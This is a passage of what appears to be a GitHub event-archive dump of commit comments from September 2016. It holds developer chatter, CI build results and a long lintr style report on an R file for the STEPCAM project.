phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/Framework/TestCase.php:702\r\n    0.1829   14282408   8. PHPUnit_Framework_TestCase->runBare() phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/Framework/TestResult.php:601\r\n    0.1835   14322464   9. PHPUnit_Framework_TestCase->runTest() phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/Framework/TestCase.php:746\r\n    0.1835   14323240  10. ReflectionMethod->invokeArgs() phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/Framework/TestCase.php:881\r\n    0.1835   14323384  11. PseudoTest->testFunctionCallAsConditonal() phar:///usr/local/Cellar/phpunit/4.7.6/libexec/phpunit-4.7.6.phar/phpunit/Framework/TestCase.php:881"}},"created_at":"2016-09-19T21:02:03Z"}
{"id":"4585909385","type":"CommitCommentEvent","actor":{"login":"stefanhendriks"},"repo":{"name":"Fundynamic/dune2themaker4j"},"payload":{"comment":{"id":19085664,"position":18,"line":19,"path":"src/main/java/com/fundynamic/d2tm/utils/Colors.java","commit_id":"e37ba208c0f48f657d83635ed6cf6f6eae900be1","created_at":"2016-09-19T21:02:27Z","updated_at":"2016-09-19T21:02:27Z","body":"doh!\n\n2016-09-19 22:54 GMT+02:00 Arjen van der Ende <notifications@github.com>:\n\n> 💸 Cashes vs. Caches 💸\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Fundynamic/dune2themaker4j/commit/e37ba208c0f48f657d83635ed6cf6f6eae900be1#commitcomment-19085542>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABRTYn0IyzBZsWn8ye-6htwVrh-zUKsaks5qrvaQgaJpZM4KA9Bl>\n> .\n>\n\n\n\n-- \nGroeten,\n\nStefan Hendriks\n\nhttp://www.stefanhendriks.com\n"}},"created_at":"2016-09-19T21:02:27Z"}
{"id":"4585911761","type":"CommitCommentEvent","actor":{"login":"Emmanuel-Armstrong"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19085666,"position":null,"line":null,"path":null,"commit_id":"024d51bb1952d97a540f962086f53fb257cdb741","created_at":"2016-09-19T21:02:52Z","updated_at":"2016-09-19T21:02:52Z","body":"We still planning on meeting up for a couple hours?\n\nOn Sep 19, 2016 10:58 AM, \"Emmanuel Armstrong\" <emmanuelrarmstrong@gmail.com>\nwrote:\n\n> Gocha yeah that makes sense I'll relook over that.  I also got the rest of\n> the methods in the client finished (I think) working on the server ones\n> now.  Cant test though because I'm getting a weird compile error and I cant\n> figure out what is actually wrong haha.  Its one of the ones where the\n> error message is not helpful so I'll figure that out too\n>\n> On Mon, Sep 19, 2016 at 10:44 AM, tyler-sassaman <notifications@github.com\n> > wrote:\n>\n>> We just need to make sure that we are using the HTTP message protocol\n>> that we outlined in class. I also have the other documents completed that\n>> we need to upload to the dropbox with this project...I will add them later\n>> today(one of which includes the message protocol that we outlined in class).\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/dssquared/Networks_Lab1/commit/024d51bb1952d97a540f962086f53fb257cdb741#commitcomment-19081626>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/ANiCOX8r_jkVsmyaT8obCKLHuTdJQKwGks5qrrvtgaJpZM4KAtAa>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-19T21:02:52Z"}
{"id":"4585919129","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19085685,"position":23,"line":0,"path":"src/app/qgsdxfexportdialog.cpp","commit_id":"62ea90c59c22d679750126e2ab654643ff40e1fa","created_at":"2016-09-19T21:03:58Z","updated_at":"2016-09-19T21:03:58Z","body":"QgsCRSCache is no more. All the caching is handled internally in QgsCoordinateReferenceSystem"}},"created_at":"2016-09-19T21:03:58Z"}
{"id":"4585919347","type":"CommitCommentEvent","actor":{"login":"SeemaKumaran"},"repo":{"name":"Staples-Inc/mqe-datasource"},"payload":{"comment":{"id":19085686,"position":null,"line":null,"path":null,"commit_id":"f5bd4b39e06c8af771f34af33df27bacd678b83a","created_at":"2016-09-19T21:04:01Z","updated_at":"2016-09-19T21:04:01Z","body":"<img width=\"1019\" alt=\"screen shot 2016-09-19 at 5 02 15 pm\" src=\"https://cloud.githubusercontent.com/assets/21314219/18648957/fd8c4918-7e8a-11e6-9ec0-fa4e57f03b2e.png\">\r\n"}},"created_at":"2016-09-19T21:04:01Z"}
{"id":"4585928289","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19085703,"position":null,"line":null,"path":null,"commit_id":"4be510a44cccc664e544342c178947b5a657c89d","created_at":"2016-09-19T21:05:34Z","updated_at":"2016-09-19T21:05:34Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.773.4be510a44cccc664e544342c178947b5a657c89d](http://build.palaso.org/viewLog.html?buildId=76922&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:04:21"}},"created_at":"2016-09-19T21:05:34Z"}
{"id":"4585933781","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19085720,"position":null,"line":null,"path":null,"commit_id":"4be510a44cccc664e544342c178947b5a657c89d","created_at":"2016-09-19T21:06:33Z","updated_at":"2016-09-19T21:06:33Z","body":"TeamCity libpalaso :: palaso-trusty64-lfmerge Continuous [Build 2.6.72.4be510a44cccc664e544342c178947b5a657c89d](http://build.palaso.org/viewLog.html?buildId=76925&buildTypeId=PalasoPrecise64lfmergeContinuous) outcome was **FAILURE**\nSummary: Tests failed: 4, passed: 3466, ignored: 107 Build time: 00:05:06\n### Failed tests\n```\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.ReleaseLock_LockedByActiveProcess_LockFileExists: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcess_ReturnsFalse: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcessNotTimedOut_ReturnsFalse: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcessTimedOut_ReturnsTrue: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-19T21:06:33Z"}
{"id":"4585936870","type":"CommitCommentEvent","actor":{"login":"gabizou"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19085729,"position":13,"line":35,"path":"src/main/java/org/spongepowered/api/item/inventory/entity/PlayerInventory.java","commit_id":"b88f5eba36f8f62892b10f17ea094d5bcb884ea1","created_at":"2016-09-19T21:07:05Z","updated_at":"2016-09-19T21:07:05Z","body":"Comment on the OCD Issue."}},"created_at":"2016-09-19T21:07:05Z"}
{"id":"4585937154","type":"CommitCommentEvent","actor":{"login":"gabizou"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19085730,"position":25,"line":48,"path":"src/main/java/org/spongepowered/api/item/inventory/entity/PlayerInventory.java","commit_id":"b88f5eba36f8f62892b10f17ea094d5bcb884ea1","created_at":"2016-09-19T21:07:09Z","updated_at":"2016-09-19T21:07:09Z","body":"Comment on the OCD Issue.\r\n"}},"created_at":"2016-09-19T21:07:09Z"}
{"id":"4585937361","type":"CommitCommentEvent","actor":{"login":"gabizou"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19085732,"position":32,"line":55,"path":"src/main/java/org/spongepowered/api/item/inventory/entity/PlayerInventory.java","commit_id":"b88f5eba36f8f62892b10f17ea094d5bcb884ea1","created_at":"2016-09-19T21:07:11Z","updated_at":"2016-09-19T21:07:11Z","body":"Comment on the OCD Issue."}},"created_at":"2016-09-19T21:07:11Z"}
{"id":"4585937610","type":"CommitCommentEvent","actor":{"login":"gabizou"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19085734,"position":39,"line":62,"path":"src/main/java/org/spongepowered/api/item/inventory/entity/PlayerInventory.java","commit_id":"b88f5eba36f8f62892b10f17ea094d5bcb884ea1","created_at":"2016-09-19T21:07:13Z","updated_at":"2016-09-19T21:07:13Z","body":"Comment on the OCD Issue."}},"created_at":"2016-09-19T21:07:13Z"}
{"id":"4585937843","type":"CommitCommentEvent","actor":{"login":"gabizou"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19085735,"position":46,"line":69,"path":"src/main/java/org/spongepowered/api/item/inventory/entity/PlayerInventory.java","commit_id":"b88f5eba36f8f62892b10f17ea094d5bcb884ea1","created_at":"2016-09-19T21:07:16Z","updated_at":"2016-09-19T21:07:16Z","body":"Comment on the OCD Issue."}},"created_at":"2016-09-19T21:07:16Z"}
{"id":"4585938830","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19085738,"position":null,"line":null,"path":null,"commit_id":"9a8d5fd2527391c862699916be181773c3ace3b3","created_at":"2016-09-19T21:07:26Z","updated_at":"2016-09-19T21:07:26Z","body":"makingPrettyTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9a8d5fd2527391c862699916be181773c3ace3b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9a8d5fd2527391c862699916be181773c3ace3b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-19T21:07:26Z"}
{"id":"4585939475","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19085740,"position":null,"line":null,"path":null,"commit_id":"6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97","created_at":"2016-09-19T21:07:31Z","updated_at":"2016-09-19T21:07:31Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:88:6:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L88) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in seq_along(sd_vals)) {\n     ^\n```\n[R/ABC_SMC.R:89:7:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L89) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(sd_vals[[i]] == 0.000) {\n      ^\n```\n[R/ABC_SMC.R:91:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L91) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"one of the community summary statistics shows no variation in your dataset\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:18:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:18:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:18:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:101:13:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:102:17:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:103:16:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L103) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:104:16:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:16:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:111:21:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L111) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:112:26:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L112) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:113:16:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L113) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:120:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L120) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:124:7:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L124) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:124:10:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L124) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:124:23:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L124) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:124:29:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L124) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:145:5:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:146:28:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L146) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:146:28:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L146) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:12:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:29:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L158) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L160) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:162:19:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L162) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:190:20:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L190) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:190:20:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L190) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L191) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:192:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L192) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:193:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L193) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:198:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L198) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/ABC_SMC.R:199:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L199) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n^\n```\n[R/ABC_SMC.R:200:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L200) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                          collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:201:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L201) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }\n^\n```\n[R/ABC_SMC.R:202:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L202) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L205) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:207:14:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L207) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:9:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:27:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:19:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:19:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:19:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:217:14:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:218:18:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:219:17:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L219) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:220:17:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L220) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                